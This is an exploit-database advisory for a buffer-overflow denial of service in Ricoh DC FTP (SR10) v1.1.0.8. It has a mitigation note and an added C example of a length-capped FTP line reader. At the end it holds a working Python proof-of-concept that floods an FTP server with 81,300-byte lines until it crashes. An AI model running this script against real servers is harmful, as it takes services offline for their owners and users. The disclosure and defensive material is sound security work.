Vendor: Ricoh DC FTP (SR10)
By: j2x6
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: Ricoh DC FTP (SR10)
Affected Version From: 1.1.0.8
Affected Version To: 1.1.0.8
Patch Exists: YES
Related CWE: N/A
CPE: a:ricoh:ricoh_dc_ftp_sr10:1.1.0.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
Year: 2015

Ricoh DC FTP (SR10) v1.1.0.8 DoS

A buffer overflow vulnerability exists in the FTP server of the Ricoh DC FTP (SR10) v1.1.0.8 software. An attacker can send a specially crafted packet with a length of 81300 bytes or more to the FTP server, which will cause the server to crash. This can be exploited to cause a denial of service condition.

Mitigation:

Upgrade to the latest version of the Ricoh DC FTP (SR10) software.
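
For anyone maintaining an FTP service, the general fix for this class of bug is a command reader that enforces a hard line limit. The C code below is an added example, not Ricoh's code and not part of the original advisory; the 512-byte cap and all type and function names are assumptions. It replays, purely in memory, a constructed copy of the line sequence used by the proof of concept on this page and shows the oversized lines being rejected without any write past the buffer.

```c
#include <stddef.h>

#define FTP_LINE_MAX 512 /* assumed cap; real FTP commands are far shorter */
enum line_status { LINE_INCOMPLETE, LINE_READY, LINE_TOO_LONG };
struct tally { int accepted, rejected; };
struct line_reader {
    char   buf[FTP_LINE_MAX + 1]; /* +1 for the terminating NUL */
    size_t len;                   /* bytes stored in buf */
    int    discarding;            /* set while skipping an oversized line */
};

/* Consume one received byte; never writes past buf, whatever the peer sends. */
enum line_status feed_byte(struct line_reader *r, char c)
{
    if (c == '\n') {
        enum line_status s = r->discarding ? LINE_TOO_LONG : LINE_READY;
        if (r->len > 0 && r->buf[r->len - 1] == '\r')
            r->len--;              /* strip the CR of CRLF */
        r->buf[r->len] = '\0';     /* caller reads buf only on LINE_READY */
        r->len = 0;
        r->discarding = 0;         /* resynchronise on the next line */
        return s;
    }
    if (r->discarding || r->len == FTP_LINE_MAX) {
        r->discarding = 1;         /* full: drop bytes instead of overflowing */
        return LINE_INCOMPLETE;
    }
    r->buf[r->len++] = c;
    return LINE_INCOMPLETE;
}

/* Constructed input: two lines of `fill` bytes, an empty line, then "EXIT".
 * Each 'A' in the template stands for `fill` repeated 'A' bytes. */
struct tally replay_constructed(size_t fill)
{
    struct line_reader r = {{0}, 0, 0};
    struct tally t = {0, 0};
    const char *p;
    size_t n;
    for (p = "A\r\nA\r\n\r\nEXIT\r\n"; *p; p++)
        for (n = (*p == 'A') ? fill : 1; n; n--) {
            enum line_status s = feed_byte(&r, *p);
            t.accepted += (s == LINE_READY);
            t.rejected += (s == LINE_TOO_LONG);
        }
    return t;
}
```

With `fill` set to 81300, both long lines come back as `LINE_TOO_LONG` and the reader resynchronises, so the empty line and `EXIT` are still parsed normally.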

Exploit-DB raw data:

# Exploit Title: Rocoh DC FTP (SR10) v1.1.0.8 DoS
# Date: 8/31/2015
# Exploit Author: j2x6
# Vendor Homepage: http://www.ricoh-imaging.co.jp/
# Software Link: http://www.ricoh-imaging.co.jp/english/r_dc/download/sw/win/07.html
# Version: 1.1.0.8
# Tested on: Windows 7
# Offset for Buffer Overflow attempt: 495

#!/usr/bin/python

import socket

badthing= "A" * 81300

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('192.168.45.11',21))
s.send(badthing+'\r\n')
s.send(badthing+'\r\n')
s.send('\r\n')
s.send('EXIT\r\n')
s.close()